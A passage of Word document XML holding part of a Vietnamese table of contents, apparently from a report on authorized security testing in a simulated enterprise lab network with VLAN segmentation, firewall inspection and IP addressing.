          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>nghiệm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·················· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F4356D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.1.1. Nguyên </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tắc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đạo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đức</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>nghề</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>nghiệp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phạm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> vi </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kiểm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thử</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ủy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>quyền</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ····· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB26486" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.1.2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Yêu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cầu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>về</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tính</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cô</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lập</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kiểm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>soát</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>rủi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ················· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC73EED" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.1.3. Phương </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>pháp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>luận</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>nghiên</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cứu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>chuỗi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>nhân</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>quả</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Causal-Chain)</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ······· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C5C032" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">  2.2. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Thiết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kế</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kiến</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trúc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lab</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>doanh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>nghiệp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mô</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phỏng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ··················· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B1D8C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.2.1. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Cấu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trúc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phân</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đoạn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 VLAN</w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·································· </w:t>
      </w:r>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Trang 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12596678" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:sz w:val="23"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>2.2.2. Nguyên lý Inter-VLAN Routing và Firewall Inspection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ············· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABCBE92" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.2.3. Sơ đồ Topo mạng kiến trúc doanh nghiệp mô phỏng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ················· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7AAA1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">    2.2.4. Phân bổ không gian địa chỉ IP và thông số kỹ thuật</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A0A0A0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ·············· </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="64748B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trang 24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23898FD2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
